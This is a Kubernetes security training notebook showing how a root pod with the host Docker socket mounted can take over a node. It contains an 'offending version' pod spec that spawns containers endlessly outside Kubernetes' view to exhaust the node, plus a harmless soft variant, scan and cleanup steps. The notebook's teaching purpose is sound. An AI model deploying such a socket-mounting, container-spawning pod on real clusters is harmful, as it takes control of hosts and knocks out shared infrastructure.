**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

# Cloudbomb


## Purpose

It is shown, how dangerous it is 

* to start an image from an untrusted source
* with __root privileges__
* and __access to the host file system__

This examples destroys the cluster step by step. 

It is a dangerous example, turned _s l o w_ for didactic purposes.

It can even be made more disruptive easily.

Don't put images like this into public registries.


#### Create an empty directory and change into

In [1]:
mkdir -p cloudbomb
cd cloudbomb

In [2]:
pwd

/minikube-host/notebooks/training-kubernetes-security/cloudbomb


#### Get Docker

See the latest statically linked versions here
https://download.docker.com/linux/static/stable/x86_64/

In [3]:
curl https://download.docker.com/linux/static/stable/x86_64/docker-19.03.8.tgz -o docker.tgz

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 60.7M  100 60.7M    0     0  21.8M      0  0:00:02  0:00:02 --:--:-- 21.8M


In [4]:
tar tzf docker.tgz

docker/
docker/containerd
docker/docker
docker/ctr
docker/dockerd
docker/runc
docker/docker-proxy
docker/docker-init
docker/containerd-shim


In [6]:
pwd

/minikube-host/training/notebooks/cloudbomb


In [5]:
tar xzf docker.tgz

### Create the Dockerfile

and build the image **inside minikube**

In [6]:
cat > Dockerfile <<EOF
FROM alpine

COPY docker/docker /usr/bin

CMD ["docker", "ps"]
EOF
cat Dockerfile

FROM alpine

COPY docker/docker /usr/bin

CMD ["docker", "ps"]


In [9]:
docker images

REPOSITORY                                TAG        IMAGE ID       CREATED         SIZE
nginx                                     latest     f6d0b4767a6c   2 weeks ago     133MB
nginxinc/nginx-unprivileged               latest     b34dace3569f   5 weeks ago     133MB
kubernetesui/dashboard                    v2.1.0     9a07b5b4bfac   6 weeks ago     226MB
k8s.gcr.io/kube-proxy                     v1.20.0    10cc881966cf   6 weeks ago     118MB
k8s.gcr.io/kube-scheduler                 v1.20.0    3138b6e3d471   6 weeks ago     46.4MB
k8s.gcr.io/kube-controller-manager        v1.20.0    b9fa1895dcaa   6 weeks ago     116MB
k8s.gcr.io/kube-apiserver                 v1.20.0    ca9843d3b545   6 weeks ago     122MB
gcr.io/k8s-minikube/storage-provisioner   v4         85069258b98a   7 weeks ago     29.7MB
k8s.gcr.io/etcd                           3.4.13-0   0369cf4303ff   5 months ago    253MB
k8s.gcr.io/coredns                        1.7.0      bfe3a36ebd25   7 months ago    45.2MB
kubernet

In [7]:
docker build . -t cloudbomb

Sending build context to Docker daemon  274.7MB
Step 1/3 : FROM alpine
latest: Pulling from library/alpine

Digest: sha256:69e70a79f2d41ab5d637de98c1e0b055206ba40a8145e7bddb55ccc04e13cf8f
Status: Downloaded newer image for alpine:latest
 ---> 6dbb9cc54074
Step 2/3 : COPY docker/docker /usr/bin
 ---> 657ae76b201e
Step 3/3 : CMD ["docker", "ps"]
 ---> Running in 94a1872f3773
Removing intermediate container 94a1872f3773
 ---> 7392e6e1931e
Successfully built 7392e6e1931e
Successfully tagged cloudbomb:latest


#### Check the images

`grep -E ... ` is only for colouring 

In [8]:
docker images | grep --color=always -E '$|cloudbomb.*$' 

REPOSITORY                                TAG        IMAGE ID       CREATED         SIZE
cloudbomb                                 latest     7392e6e1931e   6 seconds ago   71.4MB
nginxinc/nginx-unprivileged               latest     37c71e98f25c   13 days ago     133MB
alpine                                    latest     6dbb9cc54074   13 days ago     5.61MB
nginx                                     latest     62d49f9bab67   2 weeks ago     133MB
gcr.io/k8s-minikube/storage-provisioner   v5         6e38f40d628d   4 weeks ago     31.5MB
k8s.gcr.io/kube-proxy                     v1.20.2    43154ddb57a8   3 months ago    118MB
k8s.gcr.io/kube-apiserver                 v1.20.2    a8c2fdb8bf76   3 months ago    122MB
k8s.gcr.io/kube-controller-manager        v1.20.2    a27166429d98   3 months ago    116MB
k8s.gcr.io/kube-scheduler                 v1.20.2    ed2c44fbdd78   3 months ago    46.4MB
kubernetesui/dashboard                    v2.1.0     9a07b5b4bfac   4 months ago    226MB
k8s.gcr

## Create the Cloudbomb Pod

* it is mounting the Docker socket `/var/run/docker.sock` into the container, we have `hostPath` rights
* the `docker` process is running as `root`
* **Gotcha**

# Offending version, don't use

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb 
spec:
  containers:
  - image: cloudbomb
    imagePullPolicy: IfNotPresent
    command:
      - /bin/sh
      - "-c" 
      - "while true; \
           do \   
             docker run -d --name BOOM_\$(cat /dev/urandom | \
             tr -cd 'a-f0-9' | \
             head -c 6) nginx ; \
             sleep 10 ; \
           done"
    name: cloudbomb
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
```

# Soft version

In [9]:
kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb 
spec:
  containers:
  - image: cloudbomb
    imagePullPolicy: IfNotPresent
    command:
      - /bin/sh
      - "-c" 
      - "while true; \
           do \   
             docker ps ; \
             sleep 10 ; \
           done"
    name: cloudbomb
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
EOF

pod/cloudbomb created


In [10]:
kubectl get pods

NAME                                      READY   STATUS    RESTARTS   AGE
cloudbomb                                 1/1     Running   0          3s
nginx-strict-5cdc48cf55-27r9c             1/1     Running   0          23m
nginx-strict-5cdc48cf55-k65vn             1/1     Running   0          23m
nginx-strict-5cdc48cf55-rwkt5             1/1     Running   0          23m
nginx-with-token-again-66868cff8b-dncj2   1/1     Running   0          20m


In [14]:
kubectl wait --for=condition=ready --timeout=10s pod/cloudbomb

pod/cloudbomb condition met


In [15]:
kubectl get pods

NAME                            READY   STATUS    RESTARTS   AGE
cloudbomb                       1/1     Running   0          6s
nginx-strict-5cdc48cf55-f5r5l   1/1     Running   0          3h45m
nginx-strict-5cdc48cf55-v72v5   1/1     Running   0          3h45m
nginx-strict-5cdc48cf55-xkh98   1/1     Running   0          3h45m


In [11]:
kubectl logs cloudbomb

CONTAINER ID        IMAGE                         COMMAND                  CREATED             STATUS                  PORTS               NAMES
fdd5d0665eff        7392e6e1931e                  "/bin/sh -c 'while t…"   1 second ago        Up Less than a second                       k8s_cloudbomb_cloudbomb_default_946f8797-7aff-420e-bd18-6d423f0355f2_0
a929932d188b        k8s.gcr.io/pause:3.2          "/pause"                 1 second ago        Up Less than a second                       k8s_POD_cloudbomb_default_946f8797-7aff-420e-bd18-6d423f0355f2_0
86d32a9339ca        nginxinc/nginx-unprivileged   "/docker-entrypoint.…"   20 minutes ago      Up 20 minutes                               k8s_nginx_nginx-with-token-again-66868cff8b-dncj2_default_f05b0558-0f28-4308-ae01-2279d0613cec_0
78b44b6cb884        k8s.gcr.io/pause:3.2          "/pause"                 20 minutes ago      Up 20 minutes                               k8s_POD_nginx-with-token-again-66868cff8b-dncj2_default_f05b0558-0

# Docker is 💩, let us use `cri-o`

Doesn' solve the principle problem

## Docker vs Kubernetes

The docker command bypasses Kubernetes. It is *not* visible to the `kubelet` and the `api-server`

It will kill the node _s l o w l y_

In [ ]:
docker ps | grep -E '$|.*BOOM.*$'

## Kube-Scan

Examine the pod with [Octarine Kube-Scan](https://github.com/octarinesec/kube-scan)

Open a separate terminal window and run `minikube tunnel` in this terminal

In [12]:
kubectl apply -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan.yaml

namespace/kube-scan created
configmap/kube-scan created
serviceaccount/kube-scan created
clusterrole.rbac.authorization.k8s.io/kube-scan created
clusterrolebinding.rbac.authorization.k8s.io/kube-scan created
deployment.apps/kube-scan created
service/kube-scan-ui created


In [13]:
kubectl wait -n kube-scan --for=condition=available deployment/kube-scan

deployment.apps/kube-scan condition met


In [14]:
kubectl apply -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml

namespace/kube-scan unchanged
configmap/kube-scan unchanged
serviceaccount/kube-scan unchanged
clusterrole.rbac.authorization.k8s.io/kube-scan configured
clusterrolebinding.rbac.authorization.k8s.io/kube-scan configured
deployment.apps/kube-scan unchanged
service/kube-scan-ui configured


In [16]:
echo http://$(kubectl -n kube-scan get service kube-scan-ui -o jsonpath={..ip})

http://10.96.201.143


# Risk Score

Current 5, should be 8-9 

I own the node, no network access

# Cleanup

In [ ]:
kubectl delete pod cloudbomb

In [ ]:
kubectl delete -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan.yaml -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml

# Pedestrians approach

In [18]:
kubectl get pods cloudbomb -o yaml

apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: "2021-04-28T14:08:41Z"
  name: cloudbomb
  namespace: default
  resourceVersion: "30894"
  uid: 946f8797-7aff-420e-bd18-6d423f0355f2
spec:
  containers:
  - command:
    - /bin/sh
    - -c
    - while true;            do   docker ps ;              sleep 10 ;            done
    image: cloudbomb
    imagePullPolicy: IfNotPresent
    name: cloudbomb
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  nodeName: minikube
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Always
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerati